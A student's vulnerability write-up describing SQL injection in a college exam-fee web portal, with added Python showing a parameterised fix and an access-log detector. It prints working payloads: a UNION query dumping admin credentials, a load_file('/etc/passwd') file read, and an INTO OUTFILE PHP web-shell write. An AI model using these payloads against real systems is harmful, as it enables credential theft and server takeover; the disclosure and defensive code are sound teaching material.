Assalamu alaykum,
I am Mahim Safa, a student of Dhaka College. There are 7 colleges part of Dhaka University. Those are:
These are the 7 colleges under Dhaka University. About 243,000+ students are currently studying here. All of their official operations are run through an online web portal. One of the main operations is "Yearly Form Fill Up". During this period a huge amount of money is transacted through the portal. So in the form fill up period alone an attacker could do damage of approx 729,000,000 TAKA, which is about 8,604,693 USD. There was also a reflected XSS vulnerability, but that cannot be marked as critical. Now let's see how I exploited the service.
So according to our college notice, I was given a link to the web portal for form fill up. I logged into the portal with the ID given by my college. While submitting the form the URL caught my eye, so I was a little curious about the endpoint and started playing with the URL. At one point, I found SQLi in that particular endpoint.
https://(web-portal-domain.com)/students/form_preview.php?s_year_code=1&session_id=20&exam_id=17
https://(web-portal-domain.com)/students/form_preview.php?s_year_code=1&session_id=20&exam_id=-17' union select 1,2,3,group_concat(username,0x3a,password),5,6 from admin -- -
So I played around with the SQLi and was able to extract data from the database. I found the server admin panel credentials, the college admin panel credentials, and the login credentials of all 243,000+ students along with their personal info like full name, contact number, address, father's name, mother's name, and much more. From the college admin panel, I was able to bypass any student's transaction. From the server admin panel, I was able to add, modify or remove any student. Let's move on.
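As an added example (not code from the original post, and not the portal's own source, which the write-up does not show), the following Python script reproduces the root cause on an in-memory SQLite database: a form_preview query built by string formatting beside the same query with bound parameters and integer validation. The table names and columns are assumptions; the attack input is modelled on the union payload above but adapted to SQLite, which has no three-argument group_concat.

```python
import sqlite3
from typing import List, Tuple

# Constructed attack input modelled on the exam_id payload in the write-up; SQLite has no
# three-argument group_concat, so username||':'||password is used for the same effect.
ATTACK_INPUT = "-17' union select 1,2,3,username||':'||password,5 from admin -- -"

Row = Tuple[object, ...]


def build_db() -> sqlite3.Connection:
    """Toy schema (assumed, not the portal's real one): a forms table and an admin table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE forms (id INTEGER, s_year_code INTEGER, session_id INTEGER, "
                "exam_id INTEGER, fee INTEGER)")
    con.execute("CREATE TABLE admin (id INTEGER, username TEXT, password TEXT)")
    con.executemany("INSERT INTO forms VALUES (?,?,?,?,?)",
                    [(1, 1, 20, 17, 2500), (2, 1, 20, 18, 3000)])
    con.executemany("INSERT INTO admin VALUES (?,?,?)",
                    [(1, "superadmin", "hash-placeholder-1"),
                     (2, "collegeadmin", "hash-placeholder-2")])
    con.commit()
    return con


def form_preview_vulnerable(con, s_year_code: str, session_id: str, exam_id: str) -> List[Row]:
    """The broken pattern: request parameters pasted straight into the SQL text.

    Anything after a closing quote in exam_id becomes part of the query, which is exactly
    what lets a UNION pull rows out of an unrelated table.
    """
    sql = ("SELECT id, s_year_code, session_id, exam_id, fee FROM forms "
           "WHERE s_year_code='%s' AND session_id='%s' AND exam_id='%s'"
           % (s_year_code, session_id, exam_id))
    return con.execute(sql).fetchall()


def form_preview_safe(con, s_year_code: str, session_id: str, exam_id: str) -> List[Row]:
    """The fix: validate that the ids are integers, then bind them as parameters.

    Binding alone already defeats the injection (the whole string is compared as a value
    and never parsed as SQL); the int() check is defence in depth and gives a clean
    rejection path for garbage input.
    """
    try:
        params = (int(s_year_code), int(session_id), int(exam_id))
    except ValueError:
        return []  # reject the request instead of guessing what the caller meant
    sql = ("SELECT id, s_year_code, session_id, exam_id, fee FROM forms "
           "WHERE s_year_code=? AND session_id=? AND exam_id=?")
    return con.execute(sql, params).fetchall()


if __name__ == "__main__":
    db = build_db()
    print("legit, vulnerable: ", form_preview_vulnerable(db, "1", "20", "17"))
    print("attack, vulnerable:", form_preview_vulnerable(db, "1", "20", ATTACK_INPUT))
    print("attack, safe:      ", form_preview_safe(db, "1", "20", ATTACK_INPUT))
```

In the vulnerable function the attack input returns the admin rows in place of a form row; in the safe function the same input returns nothing. The PHP equivalent of form_preview_safe is a PDO or mysqli prepared statement with the three ids bound as integers, which is the single change that would have closed every finding in this write-up.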
After accessing the database I was curious whether I could get access to the server. So I tried some SQL functions to see if they could get me RCE on the server. First I tried to read arbitrary files using the load_file() function.
https://(web-portal-domain.com)/students/form_preview.php?s_year_code=1&session_id=20&exam_id=-17' union select 1,2,3,load_file('/etc/passwd'),5,6 -- -
The SQL query executed successfully. It allowed me to read every file the webserver user was permitted to read. Through this arbitrary file read, I was able to read all the source code of the website. Then I tried to find a way of writing files to the server to get RCE. So I tried the INTO OUTFILE method to write files.
https://(web-portal-domain.com)/students/form_preview.php?s_year_code=1&session_id=20&exam_id=-17' union select 1,2,3,"<?php system($_GET['cmd']); ?>",5,6 INTO OUTFILE '/var/www/html/images/shell.php' -- -
But unfortunately, writing to that webserver directory was not permitted. That's why I was unable to get RCE on the server.
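As an added example (again not part of the original write-up), here is a small Python detector that a portal operator could run over web server access logs to catch the three stages described above: the UNION probe, the load_file() read and the INTO OUTFILE write attempt, plus the more general signal that a numeric id parameter no longer looks like a number. The log lines are constructed for the example; the IP addresses, timestamps and the placeholder string in the OUTFILE request are not from the real portal.

```python
import re
from typing import Dict, List
from urllib.parse import unquote

# Constructed sample access-log lines in combined log format, modelled on the request
# shapes in the write-up. Addresses and timestamps are placeholders.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2021:10:00:01 +0600] "GET /students/form_preview.php?s_year_code=1&session_id=20&exam_id=17 HTTP/1.1" 200 5120
203.0.113.5 - - [10/Oct/2021:10:02:14 +0600] "GET /students/form_preview.php?s_year_code=1&session_id=20&exam_id=-17%27%20union%20select%201,2,3,group_concat(username,0x3a,password),5,6%20from%20admin%20--%20- HTTP/1.1" 200 6011
203.0.113.5 - - [10/Oct/2021:10:05:40 +0600] "GET /students/form_preview.php?s_year_code=1&session_id=20&exam_id=-17%27%20union%20select%201,2,3,load_file(%27/etc/passwd%27),5,6%20--%20- HTTP/1.1" 200 7300
203.0.113.5 - - [10/Oct/2021:10:09:03 +0600] "GET /students/form_preview.php?s_year_code=1&session_id=20&exam_id=-17%27%20union%20select%201,2,3,%27placeholder%27,5,6%20INTO%20OUTFILE%20%27/var/www/html/images/shell.php%27%20--%20- HTTP/1.1" 500 312
198.51.100.9 - - [10/Oct/2021:10:10:00 +0600] "GET /students/form_preview.php?s_year_code=1&session_id=20&exam_id=18 HTTP/1.1" 200 5120
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Signatures for the three techniques in the write-up, matched against the decoded query.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\b[\s\S]*?\bselect\b", re.I),
    "file_read": re.compile(r"\bload_file\s*\(", re.I),
    "file_write": re.compile(r"\binto\s+(?:out|dump)file\b", re.I),
}

# Parameters of form_preview.php that should only ever carry integers (from the URLs above).
NUMERIC_PARAMS = ("s_year_code", "session_id", "exam_id")


def analyze_request(target: str) -> List[str]:
    """Return sorted alert labels for one request target (path plus query string)."""
    _, _, raw_query = target.partition("?")
    query = unquote(raw_query)
    alerts = set()
    # Split manually rather than with parse_qs so a ';' inside a payload never splits a value.
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        if name in NUMERIC_PARAMS and not re.fullmatch(r"-?\d+", value):
            alerts.add("non_numeric_id:" + name)
    for label, pattern in SIGNATURES.items():
        if pattern.search(query):
            alerts.add(label)
    return sorted(alerts)


def analyze_log(text: str) -> List[Dict[str, object]]:
    """Return one finding per log line that triggers at least one alert."""
    findings = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue  # malformed line; a real pipeline would count these separately
        alerts = analyze_request(match.group("target"))
        if alerts:
            findings.append({
                "ip": match.group("ip"),
                "time": match.group("ts"),
                "status": int(match.group("status")),
                "alerts": alerts,
            })
    return findings


if __name__ == "__main__":
    for finding in analyze_log(SAMPLE_LOG):
        print(finding)
```

The non_numeric_id check is the most useful rule here because it fires on the very first probe, before any UNION keyword appears, and it needs no signature updates. On the database side, the write attempt in the write-up failed for filesystem reasons; the controls that make that outcome deliberate rather than lucky are running the application's MySQL account without the FILE privilege and setting secure_file_priv, so load_file() and INTO OUTFILE are refused regardless of directory permissions.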
But in the end, it was a huge vulnerability and could have led to a huge data loss. After I reported the threat, they resolved it. As there was no bug bounty program running, I got nothing as a reward. I recommend everyone to run a bug bounty program to encourage hackers to report vulnerabilities to you rather than doing damage to your site.
That's all for now. See you soon. Stay safe.